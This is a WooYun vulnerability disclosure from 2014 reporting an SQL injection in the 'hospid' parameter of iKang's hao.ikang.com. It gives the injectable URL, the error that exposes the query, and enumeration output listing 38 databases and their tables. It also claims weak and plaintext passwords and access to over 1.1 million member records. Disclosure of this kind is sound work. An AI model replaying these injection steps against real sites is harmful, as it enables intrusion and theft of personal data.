当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073820

漏洞标题:爱康国宾某问题可导致110W用户信息泄露

相关厂商:爱康国宾

漏洞作者: 小胖子

提交时间:2014-08-25 18:49

修复时间:2014-10-09 18:50

公开时间:2014-10-09 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-25: 细节已通知厂商并且等待厂商处理中
2014-08-26: 厂商已经确认,细节仅向厂商公开
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-09: 细节向公众公开

简要描述:

话不多说,我是来刷WB参加众测的。

详细说明:

问题站点:http://hao.ikang.com
随便点击一个医院,最后形成连接
http://hao.ikang.com/?city=0021&Action=Operator&hospid=002
hospid存在注入,加个单引号报错

SELECT * FROM HOSPOPER WHERE HOSPID='002'' and (YKT_FLAG=0 or YKT_FLAG=2) ORDER BY OPERNAME ASCJKCITY数据库错误!请联系系统管理员解决。DB Error: unknown error
Notice: JKCITY数据库错误!请联系系统管理员解决。DB Error: unknown error in /web/mis9/libs/DatabaseJk.php on line 54


这里爆出表还方便我们等下查密码。

sqlin.jpg


然后有好多个数据库,好像这台是你们的主数据库服务器

available databases [38]:
[*] APEX_030200
[*] APPQOSSYS
[*] BA
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DEPO
[*] EP
[*] EXFSYS
[*] FLOWS_FILES
[*] GOME
[*] IKANG
[*] IKANG_LDAP
[*] IKANGLIS
[*] IKANGMIS3
[*] IKANGMIS3NEW
[*] JKCITY
[*] MDSYS
[*] MEC
[*] MIS2
[*] MISNEW
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] QCMS
[*] RMS
[*] SURVEY
[*] SYS
[*] SYSTEM
[*] THIRDPARTY
[*] TP
[*] TRT
[*] WMSYS
[*] WWW
[*] XDB
[*] ZHIFUBAO


至少挂载着这些系统
http://mec.ikang.com/
http://qcms.ikang.com/
http://mis2.ikang.com/
很多都是简单的md5加密,甚至是明文密码
trt的弱口令

ruokl TRT.jpg


tingka.jpg


hao的

6666.jpg


反正很多系统都能进,很多库很多数据
MIS2和MISNEW下的member库
110多万会员信息呢

1168644.jpg


漏洞证明:

Database: WWW
[44 tables]
+------------------------------+
| ACCT_DEPARTMENT |
| ACCT_USER |
| BLOCK_CONFIG |
| CARD_BLOCK_PERMISSION |
| CARD_CHANGE_PASSWORD_INFO |
| CITY_TEL_CODE |
| HOT_TRACK |
| IDENTIFY_INFO_BLOCK |
| IKCT_FILTER_CHAIN_DEFINITION |
| IKCT_GROUP |
| IKCT_GROUP_PERMISSION |
| IKCT_MENU |
| IKCT_PERMISSION |
| IKCT_USER |
| IKCT_USER_GROUP |
| JA_CONSULT |
| MIS_MEMBER_INFO |
| OTHER_CONFIG_BLOCK |
| PERMISSION |
| PLATFORM |
| PLATFORM_ADMIN_BLOCK |
| PLATFORM_BLOCK |
| PLATFORM_COMMON_CONFIG |
| PLATFORM_PROJECT |
| PLATFORM_TEMPLATE |
| UPGRADE_ITEM |
| WEIXINUSER_BAK |
| WEIXIN_ACTIVITY |
| WEIXIN_ANSWER |
| WEIXIN_BIND |
| WEIXIN_GAME |
| WEIXIN_GAME_SCORE |
| WEIXIN_GAME_SCORE20140411 |
| WEIXIN_LUCKY |
| WEIXIN_MOBILE_BIND |
| WEIXIN_MSG |
| WEIXIN_PACKAGE |
| WEIXIN_QUESTION |
| WEIXIN_REMARK |
| WEIXIN_SALEINFO |
| WEIXIN_USER |
| WEIXIN_WQ |
| WIFI |
| WINXIN_ACCESSTOKEN |
+------------------------------+
Database: SYSTEM
[160 tables]
+-------------------------------+
| AQ$_INTERNET_AGENTS |
| AQ$_INTERNET_AGENT_PRIVS |
| AQ$_QUEUES |
| AQ$_QUEUE_TABLES |
| AQ$_SCHEDULES |
| DEF$_AQCALL |
| DEF$_AQERROR |
| DEF$_CALLDEST |
| DEF$_DEFAULTDEST |
| DEF$_DESTINATION |
| DEF$_ERROR |
| DEF$_LOB |
| DEF$_ORIGIN |
| DEF$_PROPAGATOR |
| DEF$_PUSHED_TRANSACTIONS |
| HELP |
| LOGMNRC_DBNAME_UID_MAP |
| LOGMNRC_GSBA |
| LOGMNRC_GSII |
| LOGMNRC_GTCS |
| LOGMNRC_GTLO |
| LOGMNRGGC_GTCS |
| LOGMNRGGC_GTLO |
| LOGMNRP_CTAS_PART_MAP |
| LOGMNRT_MDDL$ |
| LOGMNR_AGE_SPILL$ |
| LOGMNR_ATTRCOL$ |
| LOGMNR_ATTRIBUTE$ |
| LOGMNR_CCOL$ |
| LOGMNR_CDEF$ |
| LOGMNR_COL$ |
| LOGMNR_DICTIONARY$ |
| LOGMNR_DICTSTATE$ |
| LOGMNR_ENC$ |
| LOGMNR_ERROR$ |
| LOGMNR_FILTER$ |
| LOGMNR_GLOBAL$ |
| LOGMNR_GT_TAB_INCLUDE$ |
| LOGMNR_GT_USER_INCLUDE$ |
| LOGMNR_GT_XID_INCLUDE$ |
| LOGMNR_ICOL$ |
| LOGMNR_IND$ |
| LOGMNR_INDCOMPART$ |
| LOGMNR_INDPART$ |
| LOGMNR_INDSUBPART$ |
| LOGMNR_INTEGRATED_SPILL$ |
| LOGMNR_KOPM$ |
| LOGMNR_LOB$ |
| LOGMNR_LOBFRAG$ |
| LOGMNR_LOG$ |
| LOGMNR_LOGMNR_BUILDLOG |
| LOGMNR_NTAB$ |
| LOGMNR_OBJ$ |
| LOGMNR_OPQTYPE$ |
| LOGMNR_PARAMETER$ |
| LOGMNR_PARTOBJ$ |
| LOGMNR_PROCESSED_LOG$ |
| LOGMNR_PROPS$ |
| LOGMNR_REFCON$ |
| LOGMNR_RESTART_CKPT$ |
| LOGMNR_RESTART_CKPT_TXINFO$ |
| LOGMNR_SEED$ |
| LOGMNR_SESSION$ |
| LOGMNR_SESSION_ACTIONS$ |
| LOGMNR_SESSION_EVOLVE$ |
| LOGMNR_SPILL$ |
| LOGMNR_SUBCOLTYPE$ |
| LOGMNR_TAB$ |
| LOGMNR_TABCOMPART$ |
| LOGMNR_TABPART$ |
| LOGMNR_TABSUBPART$ |
| LOGMNR_TS$ |
| LOGMNR_TYPE$ |
| LOGMNR_UID$ |
| LOGMNR_USER$ |
| LOGSTDBY$APPLY_MILESTONE |
| LOGSTDBY$APPLY_PROGRESS |
| LOGSTDBY$EDS_TABLES |
| LOGSTDBY$EVENTS |
| LOGSTDBY$FLASHBACK_SCN |
| LOGSTDBY$HISTORY |
| LOGSTDBY$PARAMETERS |
| LOGSTDBY$PLSQL |
| LOGSTDBY$SCN |
| LOGSTDBY$SKIP |
| LOGSTDBY$SKIP_SUPPORT |
| LOGSTDBY$SKIP_TRANSACTION |
| MVIEW$_ADV_AJG |
| MVIEW$_ADV_BASETABLE |
| MVIEW$_ADV_CLIQUE |
| MVIEW$_ADV_ELIGIBLE |
| MVIEW$_ADV_EXCEPTIONS |
| MVIEW$_ADV_FILTER |
| MVIEW$_ADV_FILTERINSTANCE |
| MVIEW$_ADV_FJG |
| MVIEW$_ADV_GC |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_INFO |
| MVIEW$_ADV_JOURNAL |
| MVIEW$_ADV_LEVEL |
| MVIEW$_ADV_LOG |
| MVIEW$_ADV_OUTPUT |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARAMETERS |
| MVIEW$_ADV_PARTITION |
| MVIEW$_ADV_PLAN |
| MVIEW$_ADV_PRETTY |
| MVIEW$_ADV_ROLLUP |
| MVIEW$_ADV_SQLDEPEND |
| MVIEW$_ADV_TEMP |
| MVIEW$_ADV_WORKLOAD |
| OL$ |
| OL$HINTS |
| OL$NODES |
| REPCAT$_AUDIT_ATTRIBUTE |
| REPCAT$_AUDIT_COLUMN |
| REPCAT$_COLUMN_GROUP |
| REPCAT$_CONFLICT |
| REPCAT$_DDL |
| REPCAT$_EXCEPTIONS |
| REPCAT$_EXTENSION |
| REPCAT$_FLAVORS |
| REPCAT$_FLAVOR_OBJECTS |
| REPCAT$_GENERATED |
| REPCAT$_GROUPED_COLUMN |
| REPCAT$_INSTANTIATION_DDL |
| REPCAT$_KEY_COLUMNS |
| REPCAT$_OBJECT_PARMS |
| REPCAT$_OBJECT_TYPES |
| REPCAT$_PARAMETER_COLUMN |
| REPCAT$_PRIORITY |
| REPCAT$_PRIORITY_GROUP |
| REPCAT$_REFRESH_TEMPLATES |
| REPCAT$_REPCAT |
| REPCAT$_REPCATLOG |
| REPCAT$_REPCOLUMN |
| REPCAT$_REPGROUP_PRIVS |
| REPCAT$_REPOBJECT |
| REPCAT$_REPPROP |
| REPCAT$_REPSCHEMA |
| REPCAT$_RESOLUTION |
| REPCAT$_RESOLUTION_METHOD |
| REPCAT$_RESOLUTION_STATISTICS |
| REPCAT$_RESOL_STATS_CONTROL |
| REPCAT$_RUNTIME_PARMS |
| REPCAT$_SITES_NEW |
| REPCAT$_SITE_OBJECTS |
| REPCAT$_SNAPGROUP |
| REPCAT$_TEMPLATE_OBJECTS |
| REPCAT$_TEMPLATE_PARMS |
| REPCAT$_TEMPLATE_REFGROUPS |
| REPCAT$_TEMPLATE_SITES |
| REPCAT$_TEMPLATE_STATUS |
| REPCAT$_TEMPLATE_TARGETS |
| REPCAT$_TEMPLATE_TYPES |
| REPCAT$_USER_AUTHORIZATIONS |
| REPCAT$_USER_PARM_VALUES |
| SCHEDULER_JOB_ARGS_TBL |
| SCHEDULER_PROGRAM_ARGS_TBL |
| SQLPLUS_PRODUCT_PROFILE |
+-------------------------------+

修复方案:

0x1:不要把所有数据库都放在一台服务器上撒,居然还能跨库读取
0x2:处理注入点
0x3:求20rank

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-26 11:56

厂商回复:

非常感谢此漏洞的发现,已经确认,我们尽快处理,谢谢!

最新状态:

暂无